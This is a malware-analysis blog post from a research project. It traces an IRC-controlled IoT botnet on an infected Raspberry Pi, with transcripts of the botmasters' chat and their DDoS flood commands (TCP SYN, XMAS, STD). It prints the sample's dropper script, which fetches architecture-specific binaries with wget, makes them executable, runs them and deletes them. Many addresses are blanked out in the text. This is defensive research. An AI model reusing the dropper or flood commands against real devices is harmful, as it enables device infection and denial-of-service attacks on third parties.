Analysis of an IRC based Botnet

This blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-04-26

This blogpost aims to give a insight of an IRCBased botnet describing the network behavior and showing the analysis of the C&C. By analyzing this botnet network traffic it was possible to identify the botmasters using an IRC channel and observe not only the conversation between them but also the orders they give to the bot.

Botnet behavior

The infected device was a RaspberryPi  (ARMv6) using Raspbian OS. The sample we executed was 49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0, the capture Id is 34-1. According to VirusTotal, the possible name for that malware sample is Mirai.

After running the malware for the first time, the device contacts the IP on port 80/TCP and downloads a file called “misp” using GNU Wget agent. It repeats the same action by downloading other files. The name of the downloaded files are: mips, mipsel, sh4, x86, armv7l, armv6l, i686, powerpc, i586, m68k, sparc and armv4l.

Then, the bot establishes a connection with the IP on port 6667 and joins an IRC channel called Summit. The communication with the remote server is the following:

IP > NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Found your hostnameIP >

The remote server sends a PING and our devices replies with a PONG. Then, the infected device, receives its first order, given by the botmaster which nickname is AmpAttacks:

AmpAttacks :TCP Packeting!

The bot sends SYN NS Packet packets to port 63798. The NS flag, which stands for Nonce Sum, is still an experimental flag used to help protect against accidental malicious concealment of packets from the sender[1]. The services related to the port 63798 are for Apple: Xsan. Xsan Filesystem Access. This means that either the remote server was using that port for another service or that the botnet owners knew, or the attack aimed to an Apple device.

The domain registered to that IP is The nmap scanning to that IP reveals that all ports are filtered, it also reveals that the host is up using the domain

The bot then sends an IRC Packet to report the successful end of AmpAttack TCP Flood Against

IRC Packet reporting TCP Flood Against

IRC Packet reporting TCP Flood Against

Since our bot is on the IRC channel, it is possible to observe the conversation between the members of that channel. According to the IRC RFC [2], the format to send messages on an IRC channel is:

msgto =/ nickname / ( nickname "!" user "@" host )

Considering that format, it is possible to identify the nicknames and users in the channel, some of them are:
Spoof, Tragedy, Erradic and AmpAttacks.

In the conversation, the botmasters are talking about IRC. Some of the conversation is transcript here:

IP > MODE ##Summit +q Spoof
Spoof! PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao
Spoof! PRIVMSG ##Summit :fao*
Spoof! PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao
Spoof! PRIVMSG ##Summit :fao*
Tragedy! PRIVMSG ##Summit :It's literally just a chatting program
Tragedy! PRIVMSG ##Summit :But the IRC bot forces the device to join the channel as another "client"
Tragedy! PRIVMSG ##Summit :And they listen
Tragedy! PRIVMSG ##Summit :!* makes them listen
Tragedy! MODE ##Summit +v [x86_64|BWQLXKB]
Tragedy! MODE ##Summit +v [MIPS|WGEQAV]
Tragedy! MODE ##Summit +v [ARM4T|PCVREB]
AmpAttacks! PRIVMSG ##Summit :???
Tragedy! PRIVMSG ##Summit :Giving them a voice so they can reply
Tragedy! PRIVMSG ##Summit :This is the part I need to fix
Tragedy! PRIVMSG ##Summit :!* STD 1 1

Our bot replies:

##Summit :STD Packeting!

The bot sends two kind of packets to the IP Those are:

  1. To the IP on port 256/UDP: bad length 4096 > 1472
    SUMMIT.. %s, STD Flood Against %s Finished!....Incorrect Usage, %s :XMAS <Target> <Port> <Time> 32 1024 10
    ....Incorrect Usage, %s :RawUDP <Target> <Time>
    .... %s :RawUDP Packeting %s!
    .. %s, RawUDP Flood Against %s Finished!
  2. To the IP ip-proto-17
    ........./bin/ .0x.0X.....Unknown error ..Success.Operation not permitted.No such file or directory.No such process.Interrupted system call.Input/output error.No such device or address.Argument list too long.Exec format error.Bad file descriptor..

For the attack on port 256/UDP, there were 2159 packets observed and for the TCP attack 2202 packets were observed.

The attacked IP is a DNS server [2]. Once the flood is finished, the bot reports to the master:

Tragedy, TCP Flood Against Finished!

Then, the conversation between the botmasters:

Tragedy! PRIVMSG ##Summit :I forgot to enable raw headers
Tragedy! PRIVMSG ##Summit :They'll say "@Tragedy : TCP Packeting"
Tragedy! PRIVMSG ##Summit :Then when the flood is over they'll say "@Tragedy, your TCP flood against has ended"
AmpAttacks! PRIVMSG ##Summit :!* TCP 53 10 32 syn 0 10

Our Bot reports that its starting the attack:

AmpAttacks :TCP Packeting!

The bot sends SYN packets to the IP on port 53. There is no information regarding this IP, Registrant Name: REDACTED FOR PRIVACY. Only the country information (US) and AS (5650, Frontier Communications of America, Inc.) was available. When the bot finished the flood, it reports it to the masters:

AmpAttacks, TCP Flood Against Finished! 421 [ARM4T|PCVREB] AmpAttacks, :Unknown command
Spoof! PRIVMSG ##Summit :eww yarn
AmpAttacks! PRIVMSG ##Summit :lol imagine saying ew to servers
Tragedy! PRIVMSG ##Summit :Googles and Amazons constantly leave and join back
Spoof! PRIVMSG ##Summit :eww servers
Spoof! PRIVMSG ##Summit :i call huawei
AmpAttacks! PRIVMSG ##Summit :because I'm constantly loading
AmpAttacks! PRIVMSG ##Summit :and dupes leave and rejoin
Attacks! PRIVMSG ##Summit :what I mean is
AmpAttacks! PRIVMSG ##Summit :the same bot
AmpAttacks! PRIVMSG ##Summit :trying to rejoin
Tragedy! PRIVMSG ##Summit :You can right click on a bot and get all its info with Whois
Spoof! PRIVMSG ##Summit :* [x86_64|ZBGMF] ( has joined ##Summit

Then, more than 10 bots joins to the IRC channel, those are machines from Google and Amazon that are leaving and rejoining the channel, the bot masters talked about it:

Spoof! PRIVMSG ##Summit :<~AmpAttacks> and dupes leave and rejoin
Spoof! PRIVMSG ##Summit :<~Tragedy> This doesn't allow dupes Lol the Unreal config Max per IP is set to 1. It won't let a single dupe even grab the socket
Spoof! PRIVMSG ##Summit :<~AmpAttacks> what I mean is
Spoof! PRIVMSG ##Summit :<~AmpAttacks> the same bot
Spoof! PRIVMSG ##Summit :<~AmpAttacks> trying to rejoin
Spoof! PRIVMSG ##Summit :<~Tragedy> You can right click on a bot and get all its info with Whois
Spoof! PRIVMSG ##Summit :-
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] is using modes +iwxG
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] is connecting from *
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] on ##Summit
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] using
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] has been idle 2hrs 54mins 32secs, signed on Fri Dec 21 21:57:55 2018
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] End of /WHO
Tragedy! PRIVMSG ##Summit :.ACTION .8Hits you with a swift Yeet.
Entity! PRIVMSG ##Summit :we're also testing the curl for thinkphp rn
AmpAttacks! PRIVMSG ##Summit :*die*
Tragedy! PRIVMSG ##Summit :.ACTION .4Slaps everyone with a large trout in a single swing..

Regarding our bot name: [ARM4T|PCVREB] and the names of the bots that have joined the channel, we can assume that the names of the bots have the architecture on it, for instance [MIPS|DINPVL], or [x86_64|ZBGMF]. The botmasters talked about this here:

Conversation between the botmasters

Conversation between the botmasters

The conversation between the botmasters continues and the bot receives more orders, botmasters that were not on the previous chat write on the channel:

Tragedy! PRIVMSG ##Summit :Theres no help cmd
shadoh! MODE ##Summit +v [x86_64|ITVX]
shadoh! PRIVMSG ##Summit :rip
Tragedy! PRIVMSG ##Summit :I didn't set the raw headers mode yet
Tragedy! PRIVMSG ##Summit :Was making sure floods worked
Tragedy! PRIVMSG ##Summit :And they do (:
shadoh! PRIVMSG ##Summit :!* XMAS 80 30 32 1024 10

The order from the botmaster specifies to perform a XMAS attack to the IP address 123.59.2019.185 on port 80. This is a DoS attack that sends packets to an IP and it changes the TCP headers to become harder to process for the target.  

The bot sends packets to the IP on port 80. The IP is registered in China, and the network name is CloudVsp. At the moment, the IP is not active. The packets header sent by the bot looks like this:

IP > Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, length 1024: HTTP

It is possible to observe that the TCP flag set in this case is SP.U, it means that Syn, Push and Urgent are set at the same time. While the bot is attacking, it also receives more orders from the same botmaster:

shadoh! PRIVMSG ##Summit :!* XMAS 80 30 32 1024 10

The botmaster sends the same message 9 times in total, mean while, the conversation between the attackers continues:

Spoof! PRIVMSG ##Summit :yooo
Tragedy! PRIVMSG ##Summit :We reppin Guandong over here
Tragedy! PRIVMSG ##Summit :[IPLookup] Getting Info For ->
Tragedy! PRIVMSG ##Summit :There we go lmao
Tragedy! PRIVMSG ##Summit :For the clout
Tragedy! PRIVMSG ##Summit :<3
Tragedy! QUIT :Client has disconnected from

Then, our bot receives another order:

Spoof! PRIVMSG ##Summit :!* STD 21 25

The bot replies to inform that it will be performing the received order:

##Summit :STD Packeting!

The domain of that IP is [4]. While doing the flood, the bot sends 2 kind of packets:

  1. IP address, port 5376/UDP, bad length 4096 > 1472

  2. IP address ip-proto-17

Afterwards, the bot receives more orders to perform a DoS attack on port 80:

Spoof! PRIVMSG ##Summit :!* TCP 80 22 32 syn 0 10

Our bot informs that the attack will be performed:

Spoof :TCP Packeting!

Then, the bot informs that the attack is finished;

Spoof, TCP Flood Against Finished!

In this case, the domain name registered for the IP is

After that, the bot tries to join the channel again several times, but it fails, the sequence is the following:

  1. The bot sends Syn packets to the remote server on port 6667

  2. The remote server replies with a TCP packet (P. flag):

    1. NOTICE AUTH :*** Looking up your hostname…

    2. NOTICE AUTH :*** Found your hostname

  3. The bot replies:


    2. USER VHIDFQC localhost localhost :VHIDFQC

  4. The remote server replies: 433 * [ARM4T|PCVREB] :Nickname is already in use.

 After trying several times, one of the connections succeed :

[ARM4T|PCVREB]! JOIN :##Summit

However, there seems to be a connection error, there is ping timeout: 32 seconds. Then, the remote server sends  a F packet and the connection is over. This process is repeated several times.

The bot tries to contact the remote server on port 6667 several times. It is using different user name, first using the nickname HVLLTLBT, then using PCVREB. This could be possible because several scripts were downloaded and executed at the same time to guaranteed the botnet operation.

Analysis for the extracted files

The downloaded files by the malware were extracted and analyzed on VirusTotal, most of the files were uploaded by us for the first time. The possible name for those samples is “Tsunami”. However, the possible name for the executed sample was “Mirai”. The executed sample downloads scripts that were developed for different architectures. This technique ensures that the botnet will run in most of the IoT devices because it downloads several binaries and run them until one of them will work.

List of the SHA256 hashes for the downloaded files by the malware:

Analysis of the Source Code of the Malware

The malwares code is a bash script that downloads several scripts, change their mode to +x, to execute, then execute the script and delete them.  The files names are different and most of them have the architecture name (misp, x86, armv7, etc).

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x 440fp; ./440fp; rm -rf 440fp


The binary file we used to infect the RPi was a bash script which possible name according to Virus Total is Mirai. It downloads files, execute them and then erase them. In order to do that it contacts the server on port 80 and downloads the files using GNU Wget agent.

Once the files were executed, the bot contacts a remote server on port 6667 and joins an IRC channel. The nick name it uses to joined the channel is: [ARM4T|HVLLTLBT]. It has the architecture of the device on it and a some letters. Other bots joins the channel and have the same format name.

Once our bot is in the channel, it receive orders to perform TCP flood attacks to different IPs.

This malware could be a variant of a Mirai botnet, because Mirai performs DDoS attacks. However, our bot doesn’t seems to scan for other devices on port 22 or 23. It just perform tcp flood to different IPs. Moreover, the samples downloaded by the malware were extracted and analyzed on VirusTotal, and the possible name for those samples is Tsunami.



[2] Internet Relay Chat: Client Protocol.


[4] IP:
Registry Domain ID: 109323766_DOMAIN_COM-VRSN
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2016-12-30T19:59:34Z
Creation Date: 2004-01-04T20:57:15Z
Registrar Registration Expiration Date: 2026-01-04T20:57:15Z
Registrar:, LLC
Registrar IANA ID: 146
NetRange: -
NetHandle:   NET-74-91-117-0-1
Parent:          NFOSERVERS-1 (NET-74-91-112-0-1)
NetType:       Reassigned
OriginAS:      AS32751
Customer:     Nuclearfallout Enterprises, Inc. (C02882606)


This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.

Thanks to Veronica Valeros for her help in the analysis and writing corrections.